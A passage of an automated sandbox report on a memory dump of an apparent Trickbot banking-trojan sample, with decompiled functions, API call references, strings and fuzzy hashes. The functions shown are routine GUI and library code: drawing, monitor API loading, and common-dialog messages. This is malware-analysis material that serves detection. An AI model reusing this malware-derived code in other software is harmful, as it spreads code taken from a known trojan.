							 *((intOrPtr*)( *_t339 + 0x38))(_t355 - 0x4c,  *(_t355 - 0x2c),  *(_t355 - 0x28));
							E00421188(_t339, _t355 - 0x54, 0, 0);
							 *((intOrPtr*)( *_t339 + 0x24))(5);
							E00420EC2(_t339, _t355 - 0x3c);
							Rectangle( *(_t339 + 4),  *_t351, _t351[1], _t351[2], _t351[3]);
							E00420EC2(_t339, _t355 - 0x34);
							E0042134C(_t339, _t355 - 0x5c, _t351[2] + 1, _t351[1] + 3);
							E00421398(_t339, _t351[2] + 1, _t351[3] + 1);
							E0042134C(_t339, _t355 - 0x64,  *_t351 + 3, _t351[3] + 1);
							E00421398(_t339, _t351[2] + 1, _t351[3] + 1);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							 *(_t355 - 0x74) =  *(_t355 - 0x74) + 1;
							 *((intOrPtr*)(_t355 - 0x70)) =  *((intOrPtr*)(_t355 - 0x70)) + 1;
							 *((intOrPtr*)(_t355 - 0x6c)) =  *((intOrPtr*)(_t355 - 0x6c)) - 2;
							 *((intOrPtr*)(_t355 - 0x68)) =  *((intOrPtr*)(_t355 - 0x68)) - 2;
							_t239 = GetStockObject(0);
							_t352 =  *((intOrPtr*)(_t355 + 8));
							FillRect( *(_t352 + 4), _t355 - 0x74, _t239);
							 *((intOrPtr*)( *_t352 + 0x20))(0xffffffff);
							_t244 =  *((intOrPtr*)(_t281 + 0x114));
							if( *((intOrPtr*)(_t244 + 0x10)) == 0) {
								break;
							}
							_t317 =  *((intOrPtr*)(_t281 + 0xf4));
							_t342 =  *((intOrPtr*)(_t355 - 0x10));
							if(_t317 + _t342 > ( *( *((intOrPtr*)( *_t244 + 0x5c)) + 0x1e) & 0x0000ffff)) {
								L18:
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
								 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
								if(_t342 == 0) {
									_t249 =  *((intOrPtr*)(_t281 + 0xf4));
									if( *((intOrPtr*)(_t281 + 0xf4)) > 1) {
										E00434FEB(_t281, _t249 - 1, 1);
									}
								}
								goto L21;
							}
							_t343 = _t342 + 1;
							 *((intOrPtr*)( *_t281 + 0x110))(_t317, _t343);
							_t353 =  *(_t355 - 0x1c);
							E00436259(_t281,  *((intOrPtr*)(_t281 + 0x74)), _t343,  *((intOrPtr*)(_t353 + 0x18)),  *((intOrPtr*)(_t353 + 0x1c)));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x70))(0xd, 0, 0, _t355 - 0x24);
							E00436FD2( *((intOrPtr*)(_t281 + 0x74)), _t355 - 0x24);
							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *_t353;
							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *((intOrPtr*)(_t353 + 4));
							 *(_t355 - 0x24) =  *(_t355 - 0x24) + 1;
							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *(_t355 - 0x2c);
							 *(_t355 - 0x20) =  *(_t355 - 0x20) + 1;
							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *(_t355 - 0x28);
							E00436F3A( *((intOrPtr*)(_t281 + 0x74)),  *(_t355 - 0x24),  *(_t355 - 0x20));
							E00436F50( *((intOrPtr*)(_t281 + 0x74)));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xfc))( *((intOrPtr*)(_t281 + 0x74)),  *((intOrPtr*)(_t281 + 0x114)));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
							 *((intOrPtr*)(_t355 - 0x14)) =  *((intOrPtr*)(_t355 - 0x14)) + 0x28;
							 *((intOrPtr*)(_t355 - 0x10)) = _t343;
							if(_t343 <  *((intOrPtr*)(_t281 + 0xf8))) {
								_t339 =  *((intOrPtr*)(_t355 + 8));
								continue;
							}
							goto L21;
						}
						_t342 =  *((intOrPtr*)(_t355 - 0x10));
						goto L18;
					}
				}
			}

0x004347b1
0x004347bb
0x004347c2
0x00434b7f
0x00434b84
0x00434b8c
0x004347d1
0x004347d2
0x004347dc
0x004347e5
0x004347e8
0x004347ee
0x004347f1
0x004347f8
0x00434814
0x00434819
0x0043481d
0x00434826
0x0043483c
0x00434847
0x0043484a
0x00434857
0x00434b48
0x00434b4b
0x00434b53
0x00434b5d
0x00434b63
0x00434b67
0x00434b6c
0x00434b72
0x00434b79
0x00000000
0x0043485d
0x0043485d
0x00434865
0x00434870
0x00434873
0x00434879
0x00434875
0x00434875
0x00434875
0x00434882
0x00434894
0x00434897
0x004348b1
0x004348bc
0x004348bc
0x004348d2
0x004348f1
0x00434909
0x00434913
0x00434916
0x0043491c
0x00434924
0x00434927
0x0043492a
0x00434933
0x00434940
0x00434948
0x00434956
0x00434959
0x00434959
0x00434940
0x00434962
0x00434973
0x00434980
0x0043498b
0x00434994
0x004349a7
0x004349b3
0x004349ca
0x004349db
0x004349f1
0x00434a02
0x00434a0c
0x00434a0d
0x00434a0e
0x00434a0f
0x00434a10
0x00434a13
0x00434a16
0x00434a1a
0x00434a1e
0x00434a24
0x00434a2f
0x00434a3b
0x00434a3e
0x00434a48
0x00000000
0x00000000
0x00434a50
0x00434a56
0x00434a65
0x00434b1a
0x00434b1f
0x00434b2b
0x00434b30
0x00434b32
0x00434b3b
0x00434b43
0x00434b43
0x00434b3b
0x00000000
0x00434b30
0x00434a6d
0x00434a72
0x00434a78
0x00434a84
0x00434a98
0x00434aa2
0x00434aac
0x00434aaf
0x00434ab5
0x00434ab8
0x00434abe
0x00434ac1
0x00434acd
0x00434ad5
0x00434ae8
0x00434af3
0x00434aff
0x00434b02
0x00434b0c
0x00434b0f
0x00434862
0x00000000
0x00434862
0x00000000
0x00434b15
0x00434b17
0x00000000
0x00434b17
0x00434857

APIs

__EH_prolog.LIBCMT ref: 004347B1
GetViewportOrgEx.GDI32(?,?), ref: 004347DC
GetSysColor.USER32(00000006), ref: 00434803
CreatePen.GDI32(00000000,00000002,00000000), ref: 0043480A
GetSysColor.USER32(00000010), ref: 0043482A
CreatePen.GDI32(00000000,00000003,00000000), ref: 00434832
GetDeviceCaps.GDI32(?,0000000A), ref: 004348D0
GetDeviceCaps.GDI32(?,00000008), ref: 004348DD
SetRect.USER32(?,00000000,00000000,00000000,?), ref: 004348F1
DPtoLP.GDI32(?,?,00000002), ref: 00434909
Rectangle.GDI32(00000001,762C6F7F,?,?,?), ref: 004349A7

Part of subcall function 00420EC2: SelectObject.GDI32(?,00000000), ref: 00420EE4
Part of subcall function 00420EC2: SelectObject.GDI32(?,?), ref: 00420EFA

Part of subcall function 0042134C: MoveToEx.GDI32(?,?,?,?), ref: 0042136E
Part of subcall function 0042134C: MoveToEx.GDI32(?,?,?,?), ref: 00421382

Part of subcall function 00421398: MoveToEx.GDI32(?,FFFFFFDD,FFFFFFDD,00000000), ref: 004213B2
Part of subcall function 00421398: LineTo.GDI32(?,?,?), ref: 004213C3

GetStockObject.GDI32(00000000), ref: 00434A1E
FillRect.USER32(00000001,00000000,00000000), ref: 00434A2F

Part of subcall function 00436FD2: GetViewportExtEx.GDI32(?,?), ref: 00436FE3
Part of subcall function 00436FD2: GetWindowExtEx.GDI32(?,?), ref: 00436FF0

Part of subcall function 00436F50: GetDeviceCaps.GDI32(?,0000000A), ref: 00436F65
Part of subcall function 00436F50: GetDeviceCaps.GDI32(?,00000008), ref: 00436F6E
Part of subcall function 00436F50: SetMapMode.GDI32(?,00000001), ref: 00436F86
Part of subcall function 00436F50: SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 00436F94
Part of subcall function 00436F50: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00436FA4
Part of subcall function 00436F50: IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 00436FBF

Strings

(, xrefs: 00434B02

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CapsDevice$MoveObjectRectViewport$ColorCreateSelectWindow$ClipFillH_prologIntersectLineModeRectangleStock
String ID: (
API String ID: 14264375-3887548279
Opcode ID: c7e7136b6b855bdcbabe53c65492728368ae253f506ad2948fdf6b6408d847a0
Instruction ID: d0d2d81288cd27617258977501e7ef2079da390d0cf35e44c9702eceb349eb62
Opcode Fuzzy Hash: c7e7136b6b855bdcbabe53c65492728368ae253f506ad2948fdf6b6408d847a0
Instruction Fuzzy Hash: 7FD12874A00209DFDB14DFA4C985FAEBBB5FF48304F10416AE916AB262CB75AD41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004041CD, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041CD() {
				_Unknown_base(*)()* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				intOrPtr _t11;
				struct HINSTANCE__* _t15;
				intOrPtr _t17;
				_Unknown_base(*)()* _t18;

				_t17 =  *0x44b0d8; // 0x0
				if(_t17 == 0) {
					_t15 = GetModuleHandleA("USER32");
					if(_t15 == 0) {
						L10:
						 *0x44b0c0 = 0;
						 *0x44b0c4 = 0;
						 *0x44b0c8 = 0;
						 *0x44b0cc = 0;
						 *0x44b0d0 = 0;
						 *0x44b0d4 = 0;
						 *0x44b0d8 = 1;
						return 0;
					}
					_t5 = GetProcAddress(_t15, "GetSystemMetrics");
					 *0x44b0c0 = _t5;
					if(_t5 == 0) {
						goto L10;
					}
					_t6 = GetProcAddress(_t15, "MonitorFromWindow");
					 *0x44b0c4 = _t6;
					if(_t6 == 0) {
						goto L10;
					}
					_t7 = GetProcAddress(_t15, "MonitorFromRect");
					 *0x44b0c8 = _t7;
					if(_t7 == 0) {
						goto L10;
					}
					_t8 = GetProcAddress(_t15, "MonitorFromPoint");
					 *0x44b0cc = _t8;
					if(_t8 == 0) {
						goto L10;
					}
					_t9 = GetProcAddress(_t15, "EnumDisplayMonitors");
					 *0x44b0d4 = _t9;
					if(_t9 == 0) {
						goto L10;
					}
					_t10 = GetProcAddress(_t15, "GetMonitorInfoA");
					 *0x44b0d0 = _t10;
					if(_t10 == 0) {
						goto L10;
					}
					_t11 = 1;
					 *0x44b0d8 = _t11;
					return _t11;
				}
				_t18 =  *0x44b0d0; // 0x0
				return 0 | _t18 != 0x00000000;
			}

0x004041d0
0x004041d8
0x004041f5
0x004041f9
0x00404271
0x00404271
0x00404277
0x0040427d
0x00404283
0x00404289
0x0040428f
0x00404295
0x00000000
0x0040429f
0x00404207
0x0040420b
0x00404210
0x00000000
0x00000000
0x00404218
0x0040421c
0x00404221
0x00000000
0x00000000
0x00404229
0x0040422d
0x00404232
0x00000000
0x00000000
0x0040423a
0x0040423e
0x00404243
0x00000000
0x00000000
0x0040424b
0x0040424f
0x00404254
0x00000000
0x00000000
0x0040425c
0x00404260
0x00404265
0x00000000
0x00000000
0x00404269
0x0040426a
0x00000000
0x0040426a
0x004041dc
0x00000000

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,?,00404306), ref: 004041EF
GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,00404306), ref: 00404207
GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,00404306), ref: 00404218
GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,00404306), ref: 00404229
GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,00404306), ref: 0040423A
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,00404306), ref: 0040424B
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,00404306), ref: 0040425C

Strings

MonitorFromWindow, xrefs: 00404212
GetMonitorInfoA, xrefs: 00404256
GetSystemMetrics, xrefs: 00404201
MonitorFromPoint, xrefs: 00404234
MonitorFromRect, xrefs: 00404223
USER32, xrefs: 004041EA
EnumDisplayMonitors, xrefs: 00404245

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2376520503
Opcode ID: 8dcd4ad56e0daeb56b6b550d04ad18270aec5e35b93c9b4e261a90fa81a6a2a7
Instruction ID: 7c442283ef6f31aa7c708ca7144429c862d868b0a3aa335ca78265f57d9b110f
Opcode Fuzzy Hash: 8dcd4ad56e0daeb56b6b550d04ad18270aec5e35b93c9b4e261a90fa81a6a2a7
Instruction Fuzzy Hash: A9117FB9A412009ACB129F75ACC093BBAA4FB8E782724043FE118F37D0D7788455CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0042E896, Relevance: 24.2, APIs: 16, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042E896(intOrPtr* __ecx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v0;
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				intOrPtr _t59;
				int _t61;
				int _t65;
				struct HWND__* _t74;
				struct HWND__* _t79;
				struct HMENU__* _t81;
				struct HWND__* _t84;
				struct HWND__* _t88;
				signed int _t90;
				signed int _t91;
				struct HMENU__* _t103;
				intOrPtr* _t106;
				int _t108;
				intOrPtr* _t117;
				int* _t118;
				intOrPtr* _t119;
				struct HWND__* _t120;

				_t119 = __ecx;
				_t59 =  *((intOrPtr*)( *__ecx + 0xc0))();
				_t103 = 0;
				_v4 = _t59;
				if(_a4 != 0) {
					_t117 =  *((intOrPtr*)(_t59 + 0x68));
					if(_t117 != 0) {
						 *((intOrPtr*)( *_t117 + 0x5c))(0);
					}
				}
				_t120 =  *(_t119 + 0x70);
				_t118 = _a8;
				_v12 = _t103;
				if(_t120 == _t103) {
					L13:
					_t118[2] = _v12;
					if(_a4 == _t103) {
						 *(_t119 + 0x9c) = _t103;
						_t61 = GetDlgItem( *(_t119 + 0x1c), 0xea21);
						__eflags = _t61;
						_a4 = _t61;
						if(_t61 != 0) {
							_t74 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
							__eflags = _t74;
							if(_t74 != 0) {
								SetWindowLongA(_t74, 0xfffffff4, 0xea21);
							}
							SetWindowLongA(_a4, 0xfffffff4, 0xe900);
						}
						__eflags = _t118[1];
						if(_t118[1] != 0) {
							InvalidateRect( *(_t119 + 0x1c), 0, 1);
							SetMenu( *(_t119 + 0x1c), _t118[1]);
						}
						_t108 =  *(_v4 + 0x68);
						__eflags = _t108;
						if(_t108 != 0) {
							 *((intOrPtr*)( *_t108 + 0x5c))(1);
						}
						 *((intOrPtr*)( *_t119 + 0xc8))(1);
						_t65 =  *_t118;
						__eflags = _t65 - 0xe900;
						if(_t65 != 0xe900) {
							_v0 = GetDlgItem( *(_t119 + 0x1c), _t65);
						}
						ShowWindow(_v0, 5);
						 *(_t119 + 0x48) = _t118[5];
						return E0042D210(1);
					}
					 *(_t119 + 0x9c) = _t118[4];
					E0042D210(_t103);
					_t79 = GetDlgItem( *(_t119 + 0x1c),  *_t118);
					_v0 = _t79;
					ShowWindow(_t79, _t103);
					_t81 = GetMenu( *(_t119 + 0x1c));
					_t118[1] = _t81;
					if(_t81 != _t103) {
						InvalidateRect( *(_t119 + 0x1c), _t103, 1);
						SetMenu( *(_t119 + 0x1c), _t103);
						 *(_t119 + 0xb8) =  *(_t119 + 0xb8) & 0xfffffffe;
					}
					_t118[5] =  *(_t119 + 0x48);
					 *(_t119 + 0x48) = _t103;
					E0042CDE1(_t119, 0x7915);
					if( *_t118 == 0xe900) {
						_t84 = _a4;
					} else {
						_t84 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
					}
					if(_t84 == 0) {
						return _t84;
					} else {
						return SetWindowLongA(_t84, 0xfffffff4, 0xea21);
					}
				} else {
					goto L4;
				}
				do {
					L4:
					_t88 = _t120;
					_t120 = _v0;
					_t106 =  *((intOrPtr*)(_t88 + 8));
					_t90 = GetDlgCtrlID( *(_t106 + 0x1c)) & 0x0000ffff;
					_v8 = _t90;
					if(_t90 >= 0xe800 && _t90 <= 0xe81f) {
						_t91 = 1;
						_a8 = _t91 << _t90 - 0xe800;
						if( *((intOrPtr*)( *_t106 + 0xc8))() != 0) {
							_v12 = _v12 | _a8;
						}
						if( *((intOrPtr*)( *_t106 + 0xd0))() == 0 || _v8 != 0xe81f) {
							E0042DF8C(_t118[2] & _a8, _t106, _t118[2] & _a8, 1);
						}
					}
				} while (_t120 != 0);
				_t103 = 0;
				goto L13;
			}

0x0042e89c
0x0042e8a1
0x0042e8a7
0x0042e8a9
0x0042e8b1
0x0042e8b3
0x0042e8b8
0x0042e8bd
0x0042e8bd
0x0042e8b8
0x0042e8c0
0x0042e8c3
0x0042e8c9
0x0042e8cd
0x0042e94a
0x0042e952
0x0042e955
0x0042ea05
0x0042ea0b
0x0042ea0d
0x0042ea0f
0x0042ea18
0x0042ea1e
0x0042ea20
0x0042ea22
0x0042ea2c
0x0042ea2c
0x0042ea39
0x0042ea39
0x0042ea3f
0x0042ea43
0x0042ea4c
0x0042ea58
0x0042ea58
0x0042ea62
0x0042ea65
0x0042ea67
0x0042ea6d
0x0042ea6d
0x0042ea76
0x0042ea7c
0x0042ea7e
0x0042ea80
0x0042ea88
0x0042ea88
0x0042ea92
0x0042ea9f
0x00000000
0x0042eaa2
0x0042e961
0x0042e967
0x0042e977
0x0042e97b
0x0042e97f
0x0042e988
0x0042e990
0x0042e993
0x0042e99b
0x0042e9a5
0x0042e9ab
0x0042e9ab
0x0042e9ba
0x0042e9bf
0x0042e9c2
0x0042e9ce
0x0042e9d8
0x0042e9d0
0x0042e9d4
0x0042e9d4
0x0042e9de
0x0042eaae
0x0042e9e4
0x00000000
0x0042e9ec
0x00000000
0x00000000
0x00000000
0x0042e8cf
0x0042e8cf
0x0042e8cf
0x0042e8d1
0x0042e8d4
0x0042e8e0
0x0042e8e8
0x0042e8ec
0x0042e8fd
0x0042e902
0x0042e910
0x0042e916
0x0042e916
0x0042e926
0x0042e93f
0x0042e93f
0x0042e926
0x0042e944
0x0042e948
0x00000000

APIs

GetDlgCtrlID.USER32(?), ref: 0042E8DA
GetDlgItem.USER32(?,?), ref: 0042E977
ShowWindow.USER32(00000000,00000000), ref: 0042E97F
GetMenu.USER32(?), ref: 0042E988
InvalidateRect.USER32(?,00000000,00000001), ref: 0042E99B
SetMenu.USER32(?,00000000), ref: 0042E9A5
GetDlgItem.USER32(?,0000E900), ref: 0042E9D4
SetWindowLongA.USER32(?,000000F4,0000EA21), ref: 0042E9EC
GetDlgItem.USER32(?,0000EA21), ref: 0042EA0B
GetDlgItem.USER32(?,0000E900), ref: 0042EA1E
SetWindowLongA.USER32(00000000,000000F4,0000EA21), ref: 0042EA2C
SetWindowLongA.USER32(?,000000F4,0000E900), ref: 0042EA39
InvalidateRect.USER32(?,00000000,00000001), ref: 0042EA4C
SetMenu.USER32(?,00000000), ref: 0042EA58
GetDlgItem.USER32(?,00000000), ref: 0042EA86
ShowWindow.USER32(?,00000005), ref: 0042EA92

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ItemWindow$LongMenu$InvalidateRectShow$Ctrl
String ID:
API String ID: 461998371-0
Opcode ID: 9e359cb582f7a50c8e4168cbdb49eec8df1215a2bcda1f90f530299dfe666960
Instruction ID: 117c9597cdad368f2e6a03035f7d9792f492811c3b1771dbd29823793948e872
Opcode Fuzzy Hash: 9e359cb582f7a50c8e4168cbdb49eec8df1215a2bcda1f90f530299dfe666960
Instruction Fuzzy Hash: 87616B70600311AFDB209F66EC88A2ABBE4FF08304F50492EF586972A1C775EC94CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00415683, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 114
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00415683(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* _t32;
				signed int _t34;
				void* _t40;
				int _t49;
				signed int _t58;
				intOrPtr _t63;
				void* _t64;
				intOrPtr* _t65;

				if(_a4 == 0) {
					L19:
					return 0;
				}
				_t64 = E00432D4E(0x44b2ec, E00430506);
				_t54 =  *(_t64 + 0x18);
				if( *(_t64 + 0x18) != 0) {
					E0041B54C(_t54, _a4);
					 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
				}
				_t63 = _a8;
				if(_t63 != 0x110) {
					__eflags = _t63 -  *0x44b714; // 0x0
					if(__eflags == 0) {
						L22:
						SendMessageA(_a4, 0x111, 0xe146, 0);
						_t32 = 1;
						return _t32;
					}
					__eflags = _t63 - 0x111;
					if(_t63 != 0x111) {
						L8:
						__eflags = _t63 - 0xc000;
						if(_t63 < 0xc000) {
							goto L19;
						}
						_push(_a4);
						_t65 = E00418874();
						_t34 = E0041C5C7(_t65, 0x43da50);
						__eflags = _t34;
						if(_t34 == 0) {
							L11:
							__eflags = _t63 -  *0x44b720; // 0x0
							if(__eflags != 0) {
								__eflags = _t63 -  *0x44b71c; // 0x0
								if(__eflags != 0) {
									__eflags = _t63 -  *0x44b724; // 0x0
									if(__eflags != 0) {
										__eflags = _t63 -  *0x44b718; // 0x0
										if(__eflags != 0) {
											goto L19;
										}
										return  *((intOrPtr*)( *_t65 + 0xd0))();
									}
									_t58 = _a16 >> 0x10;
									__eflags = _t58;
									 *((intOrPtr*)( *_t65 + 0xd8))(_a12, _a16 & 0x0000ffff, _t58);
									goto L19;
								}
								__eflags =  *0x44b354;
								if( *0x44b354 != 0) {
									 *(_t65 + 0x1f4) = _a16;
								}
								_t40 =  *((intOrPtr*)( *_t65 + 0xd4))();
								 *(_t65 + 0x1f4) =  *(_t65 + 0x1f4) & 0x00000000;
								return _t40;
							}
							return  *((intOrPtr*)( *_t65 + 0xd0))(_a16);
						}
						__eflags =  *(_t65 + 0x92) & 0x00000008;
						if(( *(_t65 + 0x92) & 0x00000008) != 0) {
							goto L19;
						}
						goto L11;
					}
					__eflags = _a12 - 0x40e;
					if(_a12 == 0x40e) {
						goto L22;
					}
					goto L8;
				} else {
					 *0x44b724 = RegisterWindowMessageA("commdlg_LBSelChangedNotify");
					 *0x44b720 = RegisterWindowMessageA("commdlg_ShareViolation");
					 *0x44b71c = RegisterWindowMessageA("commdlg_FileNameOK");
					 *0x44b718 = RegisterWindowMessageA("commdlg_ColorOK");
					 *0x44b714 = RegisterWindowMessageA("commdlg_help");
					_t49 = RegisterWindowMessageA("commdlg_SetRGBColor");
					_push(_a16);
					 *0x44b710 = _t49;
					_push(_a12);
					return E004172A4(_t54, _a4, 0x110);
				}
			}

0x0041568d
0x004157da
0x00000000
0x004157da
0x004156a2
0x004156a4
0x004156a9
0x004156ae
0x004156b3
0x004156b3
0x004156b7
0x004156c1
0x00415725
0x00415730
0x004157f2
0x004157fd
0x00415805
0x00000000
0x00415805
0x00415736
0x00415738
0x00415746
0x00415746
0x0041574c
0x00000000
0x00000000
0x00415752
0x0041575a
0x00415763
0x00415768
0x0041576a
0x00415775
0x00415775
0x0041577b
0x0041578c
0x00415792
0x004157b9
0x004157bf
0x004157de
0x004157e4
0x00000000
0x00000000
0x00000000
0x004157ea
0x004157c6
0x004157c6
0x004157d4
0x00000000
0x004157d4
0x00415794
0x0041579b
0x004157a0
0x004157a0
0x004157aa
0x004157b0
0x00000000
0x004157b0
0x00000000
0x00415784
0x0041576c
0x00415773
0x00000000
0x00000000
0x00000000
0x00415773
0x0041573a
0x00415740
0x00000000
0x00000000
0x00000000
0x004156c3
0x004156d5
0x004156e1
0x004156ed
0x004156f9
0x00415705
0x0041570a
0x0041570c
0x0041570f
0x00415714
0x00000000
0x0041571b

APIs

Part of subcall function 00432D4E: TlsGetValue.KERNEL32(0044B4A0,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000,?,00413D3C,00000000,00000000,00000000,00000000), ref: 00432D8D

RegisterWindowMessageA.USER32(commdlg_LBSelChangedNotify,Function_00030506), ref: 004156CE
RegisterWindowMessageA.USER32(commdlg_ShareViolation), ref: 004156DA
RegisterWindowMessageA.USER32(commdlg_FileNameOK), ref: 004156E6
RegisterWindowMessageA.USER32(commdlg_ColorOK), ref: 004156F2
RegisterWindowMessageA.USER32(commdlg_help), ref: 004156FE
RegisterWindowMessageA.USER32(commdlg_SetRGBColor), ref: 0041570A

Part of subcall function 0041B54C: SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041B57B

SendMessageA.USER32(00000000,00000111,0000E146,00000000), ref: 004157FD

Strings

commdlg_FileNameOK, xrefs: 004156DC
commdlg_help, xrefs: 004156F4
commdlg_ColorOK, xrefs: 004156E8
commdlg_LBSelChangedNotify, xrefs: 004156C9
commdlg_SetRGBColor, xrefs: 00415700
commdlg_ShareViolation, xrefs: 004156D0

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MessageWindow$Register$LongSendValue
String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
API String ID: 2377901579-3888057576
Opcode ID: 900684bfb75333cc45177bf3ada257e388348abc2edac0a0e26787e2edd12029
Instruction ID: a41f3be4db2eae72add49b151d6a0429f1812480a00410e0222ba3c4155d7401
Opcode Fuzzy Hash: 900684bfb75333cc45177bf3ada257e388348abc2edac0a0e26787e2edd12029
Instruction Fuzzy Hash: 60419135A00604EBDB25AF29DC49BFE3BA1EB84355F10042BF416573A0D7789890CBED

Uniqueness

Uniqueness Score: -1.00%

Function 004115F0, Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 44
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004115F0() {
				char _v12;
				void* _t5;
				int _t12;

				if( *0x44de45 != 0) {
					EnterCriticalSection(0x44d320);
					 *0x44de44 = 0x1e;
					GetProfileStringA("windows", "kanjimenu", "roman",  &_v12, 9);
					if(lstrcmpiA( &_v12, "kanji") == 0) {
						 *0x44de44 = 0x1f;
					}
					GetProfileStringA("windows", "hangeulmenu", "english",  &_v12, 9);
					_t12 = lstrcmpiA( &_v12, "hangeul");
					if(_t12 == 0) {
						 *0x44de44 = 0x1f;
					}
					LeaveCriticalSection(0x44d320);
					return _t12;
				}
				return _t5;
			}

0x004115fc
0x00411607
0x0041161a
0x00411630
0x00411646
0x00411648
0x00411648
0x00411665
0x00411671
0x00411675
0x00411677
0x00411677
0x00411683
0x00000000
0x00411683
0x0041168e

APIs

EnterCriticalSection.KERNEL32(0044D320,75B8679F,75798AEE,?,?,?,?,?,?,?,?,?,?,?,?,00410C07), ref: 00411607
GetProfileStringA.KERNEL32(windows,kanjimenu,roman,?,00000009), ref: 00411630
lstrcmpiA.KERNEL32(?,kanji,?,?,?,?,?,?,?,?,?,?,?,?,00410C07), ref: 00411642
GetProfileStringA.KERNEL32(windows,hangeulmenu,english,?,00000009), ref: 00411665
lstrcmpiA.KERNEL32(?,hangeul,?,?,?,?,?,?,?,?,?,?,?,?,00410C07), ref: 00411671
LeaveCriticalSection.KERNEL32(0044D320,?,?,?,?,?,?,?,?,?,?,?,?,00410C07), ref: 00411683

Strings

roman, xrefs: 00411621
windows, xrefs: 0041162B, 00411660
english, xrefs: 00411656
kanji, xrefs: 00411636
hangeulmenu, xrefs: 0041165B
hangeul, xrefs: 0041166B
kanjimenu, xrefs: 00411626

Memory Dump Source

